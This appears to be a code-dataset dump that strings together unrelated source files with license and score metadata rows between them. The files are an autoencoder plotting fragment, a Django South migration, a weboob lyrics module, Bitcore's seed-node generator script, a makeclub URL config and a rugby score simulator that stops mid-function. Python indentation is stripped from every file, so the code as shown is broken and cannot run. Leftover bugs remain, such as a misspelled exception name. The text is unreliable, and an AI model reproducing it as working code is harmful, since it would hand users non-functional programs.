sizes = np.sqrt((shift * shift).sum(axis=1))
encoders_ = encode('encode', encoders)
decoders_ = encode('decode', decoders)
dataset_ = encode('data', dataset)
noisy_ = encode('noisy', noisy)
shift_ = encode('shift', shift)
last = len(encode.axes) - 1
for row, i in enumerate(encode.axes[1:]):
bottom = row == last - 1 and ' bottom' or ''
ymin = noisy_[:, i].min()
ymax = noisy_[:, i].max()
ypad = (ymax - ymin) * 0.2
ys = np.linspace(ymin - ypad, ymax + ypad, 127)
for col, j in enumerate(encode.axes[:-1]):
if col > row:
continue
left = col == 0 and ' left' or ''
pl = last, last, row * last + col + 1
ax = lmj.plot.create_axes(pl, spines=left + bottom)
#ax.plot(mus[:, j], mus[:, i])
ax.scatter(dataset_[:, j], dataset_[:, i], marker='.', alpha=0.1)
xmin = noisy_[:, j].min()
xmax = noisy_[:, j].max()
xpad = (xmax - xmin) * 0.2
xs = np.linspace(xmin - xpad, xmax + xpad, 127)
#for f, u in enumerate(decoders_):
# ax.arrow(0, 0, u[j], u[i], color='#2ca02c', lw=2)
if plot_features:
for name, (plane, bias, norm) in enumerate(zip(encoders_, biases, norms)):
plot_feature(ax, xs, ys, plane[j], plane[i], bias, norm, name)
style = dict(arrowstyle='->', color='#1f77b4', alpha=0.3)
for source, delta, norm in zip(noisy_, shift_, sizes):
sx, sy = source[j], source[i]
dx, dy = delta[j], delta[i]
if angle_between(dx * dx + dy * dy, norm) < TAU / 8:
ax.annotate('', xy=(sx + dx, sy + dy), xytext=(sx, sy), arrowprops=style)
ax.set_xlim(xs[0], xs[-1])
if bottom: ax.set_xlabel('{} {}'.format(encode.label, j + 1))
ax.set_ylim(ys[0], ys[-1])
if left: ax.set_ylabel('{} {}'.format(encode.label, i + 1))
def main(args):
if args.seed:
np.random.seed(args.seed)
dataset = np.asarray(create_dataset(args), 'f')
dataset -= dataset.mean(axis=0)
D = args.dimensions
e = theanets.Experiment(
theanets.Autoencoder,
layers=[D, (args.features, args.activation), D])
encode = None
if args.plot_dimensions:
encode = IdentityEncoder(args.plot_dimensions)
elif args.plot_features:
encode = FeatureEncoder(args.plot_features, e.network)
else:
encode = PcaEncoder(args.plot_pcs or list(range(args.dimensions)), dataset)
for i, _ in enumerate(e.itertrain(dataset, **vars(args))):
pass
plot(args, encode, dataset, e.network,
plot_features=not isinstance(encode, FeatureEncoder))
lmj.plot.show()
if __name__ == '__main__':
climate.call(main)
| mit | 2,385,183,796,207,257,000 | 31.462617 | 93 | 0.549158 | false |
fgaudin/aemanager | accounts/migrations/0012_auto__add_field_expense_supplier.py | 1 | 12652 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Expense.supplier'
db.add_column('accounts_expense', 'supplier', self.gf('django.db.models.fields.CharField')(max_length=70, null=True, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Expense.supplier'
db.delete_column('accounts_expense', 'supplier')
models = {
'accounts.expense': {
'Meta': {'object_name': 'Expense', '_ormbases': ['core.OwnedObject']},
'amount': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'date': ('django.db.models.fields.DateField', [], {'db_index': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'payment_type': ('django.db.models.fields.IntegerField', [], {}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.CharField', [], {'max_length': '70', 'null': 'True', 'blank': 'True'})
},
'accounts.invoice': {
'Meta': {'ordering': "['invoice_id']", 'object_name': 'Invoice', '_ormbases': ['core.OwnedObject']},
'amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'customer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contact.Contact']", 'null': 'True', 'blank': 'True'}),
'discount_conditions': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'edition_date': ('django.db.models.fields.DateField', [], {'db_index': 'True'}),
'execution_begin_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'execution_end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'invoice_id': ('django.db.models.fields.IntegerField', [], {}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'paid_date': ('django.db.models.fields.DateField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'payment_date': ('django.db.models.fields.DateField', [], {'db_index': 'True'}),
'payment_type': ('django.db.models.fields.IntegerField', [], {}),
'penalty_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'penalty_rate': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '4', 'decimal_places': '2', 'blank': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'})
},
'accounts.invoicerow': {
'Meta': {'object_name': 'InvoiceRow'},
'amount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'balance_payments': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'category': ('django.db.models.fields.IntegerField', [], {}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invoice_rows'", 'to': "orm['accounts.Invoice']"}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'proposal': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invoice_rows'", 'to': "orm['project.Proposal']"}),
'quantity': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '1'}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contact.address': {
'Meta': {'object_name': 'Address', '_ormbases': ['core.OwnedObject']},
'city': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contact.Country']", 'null': 'True', 'blank': 'True'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'street': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'zipcode': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '10', 'blank': 'True'})
},
'contact.contact': {
'Meta': {'object_name': 'Contact', '_ormbases': ['core.OwnedObject']},
'address': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contact.Address']"}),
'company_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '50', 'blank': 'True'}),
'contact_type': ('django.db.models.fields.IntegerField', [], {}),
'contacts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'contacts_rel_+'", 'null': 'True', 'to': "orm['contact.Contact']"}),
'email': ('django.db.models.fields.EmailField', [], {'default': "''", 'max_length': '75', 'blank': 'True'}),
'firstname': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'function': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'legal_form': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'representative': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'representative_function': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'})
},
'contact.country': {
'Meta': {'ordering': "['country_name']", 'object_name': 'Country'},
'country_code2': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'country_code3': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'country_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.ownedobject': {
'Meta': {'object_name': 'OwnedObject'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'project.project': {
'Meta': {'object_name': 'Project', '_ormbases': ['core.OwnedObject']},
'customer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contact.Contact']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'})
},
'project.proposal': {
'Meta': {'ordering': "['begin_date', 'update_date']", 'object_name': 'Proposal', '_ormbases': ['core.OwnedObject']},
'amount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'begin_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'contract_content': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'expiration_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'ownedobject_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.OwnedObject']", 'unique': 'True', 'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['project.Project']"}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'}),
'update_date': ('django.db.models.fields.DateField', [], {})
}
}
complete_apps = ['accounts']
| agpl-3.0 | 5,774,475,095,478,383,000 | 81.155844 | 183 | 0.551138 | false |
laurentb/weboob | modules/lyricsmode/module.py | 1 | 1723 | # -*- coding: utf-8 -*-
# Copyright(C) 2016 Julien Veyssier
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from weboob.capabilities.lyrics import CapLyrics, SongLyrics
from weboob.tools.backend import Module
from weboob.tools.compat import quote_plus
from .browser import LyricsmodeBrowser
__all__ = ['LyricsmodeModule']
class LyricsmodeModule(Module, CapLyrics):
NAME = 'lyricsmode'
MAINTAINER = u'Julien Veyssier'
EMAIL = '[email protected]'
VERSION = '2.1'
DESCRIPTION = 'Lyricsmode.com lyrics website'
LICENSE = 'AGPLv3+'
BROWSER = LyricsmodeBrowser
def get_lyrics(self, id):
return self.browser.get_lyrics(id)
def iter_lyrics(self, criteria, pattern):
return self.browser.iter_lyrics(criteria, quote_plus(pattern.encode('utf-8')))
def fill_songlyrics(self, songlyrics, fields):
if 'content' in fields:
sl = self.get_lyrics(songlyrics.id)
songlyrics.content = sl.content
return songlyrics
OBJECTS = {
SongLyrics: fill_songlyrics
}
| lgpl-3.0 | -4,821,468,968,850,700,000 | 31.509434 | 86 | 0.713871 | false |
LIMXTEC/BitCore | contrib/seeds/generate-seeds.py | 1 | 4341 | #!/usr/bin/env python3
# Copyright (c) 2014-2017 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Script to generate list of seed nodes for chainparams.cpp.
This script expects two text files in the directory that is passed as an
argument:
nodes_main.txt
nodes_test.txt
These files must consist of lines in the format
<ip>
<ip>:<port>
[<ipv6>]
[<ipv6>]:<port>
<onion>.onion
0xDDBBCCAA (IPv4 little-endian old pnSeeds format)
The output will be two data structures with the peers in binary format:
static SeedSpec6 pnSeed6_main[]={
...
}
static SeedSpec6 pnSeed6_test[]={
...
}
These should be pasted into `src/chainparamsseeds.h`.
'''
from base64 import b32decode
from binascii import a2b_hex
import sys, os
import re
# ipv4 in ipv6 prefix
pchIPv4 = bytearray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff])
# tor-specific ipv6 prefix
pchOnionCat = bytearray([0xFD,0x87,0xD8,0x7E,0xEB,0x43])
def name_to_ipv6(addr):
if len(addr)>6 and addr.endswith('.onion'):
vchAddr = b32decode(addr[0:-6], True)
if len(vchAddr) != 16-len(pchOnionCat):
raise ValueError('Invalid onion %s' % s)
return pchOnionCat + vchAddr
elif '.' in addr: # IPv4
return pchIPv4 + bytearray((int(x) for x in addr.split('.')))
elif ':' in addr: # IPv6
sub = [[], []] # prefix, suffix
x = 0
addr = addr.split(':')
for i,comp in enumerate(addr):
if comp == '':
if i == 0 or i == (len(addr)-1): # skip empty component at beginning or end
continue
x += 1 # :: skips to suffix
assert(x < 2)
else: # two bytes per component
val = int(comp, 16)
sub[x].append(val >> 8)
sub[x].append(val & 0xff)
nullbytes = 16 - len(sub[0]) - len(sub[1])
assert((x == 0 and nullbytes == 0) or (x == 1 and nullbytes > 0))
return bytearray(sub[0] + ([0] * nullbytes) + sub[1])
elif addr.startswith('0x'): # IPv4-in-little-endian
return pchIPv4 + bytearray(reversed(a2b_hex(addr[2:])))
else:
raise ValueError('Could not parse address %s' % addr)
def parse_spec(s, defaultport):
match = re.match('\[([0-9a-fA-F:]+)\](?::([0-9]+))?$', s)
if match: # ipv6
host = match.group(1)
port = match.group(2)
elif s.count(':') > 1: # ipv6, no port
host = s
port = ''
else:
(host,_,port) = s.partition(':')
if not port:
port = defaultport
else:
port = int(port)
host = name_to_ipv6(host)
return (host,port)
def process_nodes(g, f, structname, defaultport):
g.write('static SeedSpec6 %s[] = {\n' % structname)
first = True
for line in f:
comment = line.find('#')
if comment != -1:
line = line[0:comment]
line = line.strip()
if not line:
continue
if not first:
g.write(',\n')
first = False
(host,port) = parse_spec(line, defaultport)
hoststr = ','.join(('0x%02x' % b) for b in host)
g.write(' {{%s}, %i}' % (hoststr, port))
g.write('\n};\n')
def main():
if len(sys.argv)<2:
print(('Usage: %s <path_to_nodes_txt>' % sys.argv[0]), file=sys.stderr)
exit(1)
g = sys.stdout
indir = sys.argv[1]
g.write('#ifndef BITCORE_CHAINPARAMSSEEDS_H\n')
g.write('#define BITCORE_CHAINPARAMSSEEDS_H\n')
g.write('/**\n')
g.write(' * List of fixed seed nodes for the bitcore network\n')
g.write(' * AUTOGENERATED by contrib/seeds/generate-seeds.py\n')
g.write(' *\n')
g.write(' * Each line contains a 16-byte IPv6 address and a port.\n')
g.write(' * IPv4 as well as onion addresses are wrapped inside a IPv6 address accordingly.\n')
g.write(' */\n')
with open(os.path.join(indir,'nodes_main.txt'),'r') as f:
process_nodes(g, f, 'pnSeed6_main', 8555)
g.write('\n')
with open(os.path.join(indir,'nodes_test.txt'),'r') as f:
process_nodes(g, f, 'pnSeed6_test', 19335)
g.write('#endif // BITCORE_CHAINPARAMSSEEDS_H\n')
if __name__ == '__main__':
main()
| mit | -4,901,292,662,621,745,000 | 30.456522 | 98 | 0.571067 | false |
cardmaster/makeclub | controlers/url.py | 1 | 3202 | '''Copyright(C): Leaf Johnson 2011
This file is part of makeclub.
makeclub is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
makeclub is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with makeclub. If not, see <http://www.gnu.org/licenses/>.
'''
'''
We use this rule:
/clubs -> list clubs, or give more search query
/club/<slug> display one club(slug=<slug>), if not exists, return 404
/club/<slug>/edit edit club with slubg=<slug>, if not exists, create one
/club/<slug>/delete delete club with slubg=<slug>, if not exists, create one
/member/<slug>[/<user>] edit membership of club(slug=<slug>), user=<user>(current_user if omitted),
when post data to a non-exits membership, will cause a create.
/activity/<slug>/<aid> display activity of a club(slug=<slug>, aid=<aid)
/activity/<slug>/<aid>/edit edit activity of a club(slug=<slug>, aid=<aid)
/activity/<slug>/<aid>/(join|quit|confirm) join an activity of a club(slug=<slug>, aid=<aid), if specify an 'targetUser'
field in request data, will cause this targetUser join this activity
'''
import re
import os.path
pathjoin = os.path.join
def extPattern(base):
return base + '($|/.*)'
class ModuleUrlConf(object):
@staticmethod
def generatePattern(base):
return (base % '(\S+)')
def __init__(self, base, pattern=''):#Base url must have a %s, to specify the variable part
self.base = base
if (not pattern):
self.pattern = ModuleUrlConf.generatePattern(base)
else:
self.pattern = pattern
def path(self, *args):
strs = tuple ([str(arg) for arg in args])
return self.base % strs
def analyze(self, path):
reg = re.compile(self.pattern)
mat = reg.match (path)
if (mat):
try:
return mat.groups()
except:
return []
else:
return []
from helper import splitPath
class MemberUrlConf(ModuleUrlConf):
def __init__(self, stub):
super(MemberUrlConf, self).__init__(stub + '/%s/%s', stub + '/.*')
self.stub = stub
def path(self, slug, user=''):
return ModuleUrlConf.path(self, slug, user)
def analyze(self, path):
result = splitPath(path, self.stub, 2)
return result
urldict = dict (
ClubList = ModuleUrlConf('/clubs', extPattern('(/$|/clubs)') ),
ClubView = ModuleUrlConf('/club/%s', '/club/(\S+)/?$'),
ClubEdit = ModuleUrlConf('/club/%s/edit', '/club/(\S+)/edit/?$'),
Member = MemberUrlConf('/member'),
ClubPrivilige = MemberUrlConf('/priv'),
ActivityView = ModuleUrlConf('/act/id/%s', '/act/id/(\d+)/?$'),
ActivityEdit = ModuleUrlConf('/act/id/%s/edit', '/act/id/(\d+)/edit/?$'),
ActivityParticipate = ModuleUrlConf('/act/id/%s/%s', '/act/id/(\d+)/(join|quit|confirm|bill|rebill)/?$'),
ActivityNew = ModuleUrlConf('/act/new/%s', '/act/new/(\S+)/?$'),
Test = ModuleUrlConf('/test/%s', extPattern('/test'))
)
| agpl-3.0 | -1,901,133,220,814,521,600 | 35.804598 | 120 | 0.682698 | false |
JoeJimFlood/RugbyPredictifier | 2020SuperRugby/matchup.py | 1 | 16562 | import os
os.chdir(os.path.dirname(__file__))
import sim_util
import sys
import pandas as pd
import numpy as np
from numpy.random import poisson, uniform
from numpy import mean
import time
import math
po = False
team_homes = pd.read_csv(os.path.join(os.path.split(__file__)[0], 'TeamHomes.csv'), header = None, index_col = 0)
stadium_locs = pd.read_csv(os.path.join(os.path.split(__file__)[0], 'StadiumLocs.csv'), index_col = 0)
teamsheetpath = os.path.join(os.path.split(__file__)[0], 'Score Tables')
compstat = {'TF': 'TA', 'TA': 'TF', #Dictionary to use to compare team stats with opponent stats
'CF': 'CA', 'CA': 'CF',
'CON%F': 'CON%A', 'CON%A': 'CON%F',
'PF': 'PA', 'PA': 'PF',
'DGF': 'DGA', 'DGA': 'DGF'}
def weighted_variance(data, weights):
assert len(data) == len(weights), 'Data and weights must be same length'
weighted_average = np.average(data, weights = weights)
v1 = weights.sum()
v2 = np.square(weights).sum()
return (weights*np.square(data - weighted_average)).sum() / (v1 - (v2/v1))
def get_opponent_stats(opponent, venue): #Gets summaries of statistics for opponent each week
opponent_stats = {}
global teamsheetpath, stadium_locs, team_homes
opp_stats = pd.DataFrame.from_csv(os.path.join(teamsheetpath, opponent + '.csv'))
opponent_home = team_homes[1][opponent]
(venue_lat, venue_lng) = stadium_locs.loc[venue, ['Lat', 'Long']]
(opponent_home_lat, opponent_home_lng) = stadium_locs.loc[opponent_home, ['Lat', 'Long']]
opponent_reference_distance = geodesic_distance(opponent_home_lat, opponent_home_lng, venue_lat, venue_lng)
def get_opponent_weight(location):
return get_travel_weight(location, opponent_home_lat, opponent_home_lng, opponent_reference_distance)
opp_stats['Weight'] = opp_stats['VENUE'].apply(get_opponent_weight)
for stat in opp_stats.columns:
if stat != 'VENUE':
if stat != 'OPP':
opponent_stats.update({stat: np.average(opp_stats[stat], weights = opp_stats['Weight'])})
try:
opponent_stats.update({'CON%F': float((opp_stats['CF']*opp_stats['Weight']).sum())/(opp_stats['TF']*opp_stats['Weight']).sum()})
except ZeroDivisionError:
opponent_stats.update({'CON%F': 0.75})
try:
opponent_stats.update({'CON%A': float((opp_stats['CA']*opp_stats['Weight']).sum())/(opp_stats['TA']*opp_stats['Weight']).sum()})
except ZeroDivisionError:
opponent_stats.update({'CON%A': 0.75})
return opponent_stats
def get_residual_performance(score_df): #Get how each team has done compared to the average performance of their opponents
global teamsheetpath, team_homes, stadium_locs
#score_df = pd.DataFrame.from_csv(os.path.join(teamsheetpath, team + '.csv'))
residual_stats = {}
residual_variances = {}
score_df['CON%F'] = np.nan
score_df['CON%A'] = np.nan
for week in score_df.index:
opponent_stats = get_opponent_stats(score_df['OPP'][week], score_df['VENUE'][week])
for stat in opponent_stats:
if week == score_df.index.tolist()[0]:
score_df['OPP_' + stat] = np.nan
score_df['OPP_' + stat][week] = opponent_stats[stat]
score_df['CON%F'][week] = float(score_df['CF'][week]) / score_df['TF'][week]
score_df['CON%A'][week] = float(score_df['CA'][week]) / score_df['TA'][week]
for stat in opponent_stats:
if stat == 'Weight':
continue
score_df['R_' + stat] = score_df[stat] - score_df['OPP_' + compstat[stat]]
if stat in ['TF', 'PF', 'DGF', 'TA', 'PA', 'DGA']:
residual_stats.update({stat: np.average(score_df['R_' + stat], weights = score_df['Weight'])})
residual_variances[stat] = weighted_variance(score_df['R_' + stat], score_df['Weight'])
elif stat == 'CON%F':
try:
residual_stats.update({stat: (score_df['R_CON%F'].multiply(score_df['TF'])*score_df['Weight']).sum() / (score_df['TF']*score_df['Weight']).sum()})
except ZeroDivisionError:
residual_stats.update({stat: 0})
elif stat == 'CON%A':
try:
residual_stats.update({stat: (score_df['R_CON%A'].multiply(score_df['TA'])*score_df['Weight']).sum() / (score_df['TA']*score_df['Weight']).sum()})
except ZeroDisivionError:
residual_stats.update({stat: 0})
return residual_stats, pd.Series(residual_variances)
#def get_score(expected_scores): #Get the score for a team based on expected scores
# score = 0
# if expected_scores['T'] > 0:
# tries = poisson(expected_scores['T'])
# else:
# tries = poisson(0.01)
# score = score + 6 * tries
# if expected_scores['P'] > 0:
# fgs = poisson(expected_scores['P'])
# else:
# fgs = poisson(0.01)
# score = score + 3 * fgs
# if expected_scores['DG'] > 0:
# sfs = poisson(expected_scores['DG'])
# else:
# sfs = poisson(0.01)
# score = score + 2 * sfs
# for t in range(tries):
# successful_con_determinant = uniform(0, 1)
# if successful_con_determinant <= expected_scores['CONPROB']:
# score += 2
# else:
# continue
# #if tries >= 4:
# # bp = True
# #else:
# # bp = False
# return (score, tries)
#def game(team_1, team_2,
# expected_scores_1, expected_scores_2,
# playoff = False): #Get two scores and determine a winner
# (score_1, tries_1) = get_score(expected_scores_1)
# (score_2, tries_2) = get_score(expected_scores_2)
# if tries_1 - tries_2 >= 3:
# bp1 = True
# bp2 = False
# elif tries_2 - tries_1 >= 3:
# bp1 = False
# bp2 = True
# else:
# bp1 = False
# bp2 = False
# if score_1 > score_2:
# win_1 = 1
# win_2 = 0
# draw_1 = 0
# draw_2 = 0
# if bp1:
# bpw1 = 1
# else:
# bpw1 = 0
# if bp2:
# bpl2 = 1
# else:
# bpl2 = 0
# bpl1 = 0
# bpw2 = 0
# bpd1 = 0
# bpd2 = 0
# lbp1 = 0
# if score_1 - score_2 <= 7:
# lbp2 = 1
# else:
# lbp2 = 0
# elif score_2 > score_1:
# win_1 = 0
# win_2 = 1
# draw_1 = 0
# draw_2 = 0
# if bp1:
# bpl1 = 1
# else:
# bpl1 = 0
# if bp2:
# bpw2 = 1
# else:
# bpw2 = 0
# bpw1 = 0
# bpl2 = 0
# bpd1 = 0
# bpd2 = 0
# lbp2 = 0
# if score_2 - score_1 <= 7:
# lbp1 = 1
# else:
# lbp1 = 0
# else:
# if playoff:
# win_1 = 0.5
# win_2 = 0.5
# draw_1 = 0
# draw_2 = 0
# bpw1 = 0
# bpw2 = 0
# bpd1 = 0
# bpd2 = 0
# bpl1 = 0
# bpl2 = 0
# lbp1 = 0
# lbp2 = 0
# else:
# win_1 = 0
# win_2 = 0
# draw_1 = 1
# draw_2 = 1
# bpw1 = 0
# bpw2 = 0
# bpl1 = 0
# bpl2 = 0
# lbp1 = 0
# lbp2 = 0
# if bp1:
# bpd1 = 1
# else:
# bpd1 = 0
# if bp2:
# bpd2 = 1
# else:
# bpd2 = 0
# summary = {team_1: [win_1, draw_1, score_1, bpw1, bpd1, bpl1, lbp1]}
# summary.update({team_2: [win_2, draw_2, score_2, bpw2, bpd2, bpl2, lbp2]})
# return summary
def get_expected_scores(team_1_stats, team_2_stats, team_1_df, team_2_df): #Get the expected scores for a matchup based on the previous teams' performances
expected_scores = {}
#print('\n')
#print('Residual Stats')
#print(team_1_stats)
#print(team_2_stats)
#print('\n')
for stat in team_1_stats:
expected_scores.update({'T': mean([team_1_stats['TF'] + np.average(team_2_df['TA'], weights = team_2_df['Weight']),
team_2_stats['TA'] + np.average(team_1_df['TF'], weights = team_1_df['Weight'])])})
expected_scores.update({'P': mean([team_1_stats['PF'] + np.average(team_2_df['PA'], weights = team_2_df['Weight']),
team_2_stats['PA'] + np.average(team_1_df['PF'], weights = team_1_df['Weight'])])})
expected_scores.update({'DG': mean([team_1_stats['DGF'] + np.average(team_2_df['DGA'], weights = team_2_df['Weight']),
team_2_stats['DGA'] + np.average(team_1_df['DGF'], weights = team_1_df['Weight'])])})
#expected_scores['T'] = max(expected_scores['T'], 0)
#expected_scores['P'] = max(expected_scores['P'], 0)
expected_scores['DG'] = max(expected_scores['DG'], 0)
#print mean([team_1_stats['PAT1%F'] + team_2_df['PAT1AS'].astype('float').sum() / team_2_df['PAT1AA'].sum(),
# team_2_stats['PAT1%A'] + team_1_df['PAT1FS'].astype('float').sum() / team_1_df['PAT1FA'].sum()])
try:
conprob = mean([team_1_stats['CON%F'] + (team_2_df['CA']*team_2_df['Weight']).sum() / (team_2_df['TA']*team_2_df['Weight']).sum(),
team_2_stats['CON%A'] + (team_1_df['CF']*team_1_df['Weight']).sum() / (team_1_df['TF']*team_1_df['Weight']).sum()])
except ZeroDivisionError:
conprob = 0.75
if not math.isnan(conprob):
conprob = min(max(conprob, 0.01), 0.99)
expected_scores.update({'CONPROB': conprob})
else:
expected_scores.update({'CONPROB': 0.75})
#print(expected_scores['PAT1PROB'])
#print(expected_scores)
return expected_scores
def geodesic_distance(olat, olng, dlat, dlng):
'''
Returns geodesic distance in percentage of half the earth's circumference between two points on the earth's surface
'''
scale = math.tau/360
olat *= scale
olng *= scale
dlat *= scale
dlng *= scale
delta_lat = (dlat - olat)
delta_lng = (dlng - olng)
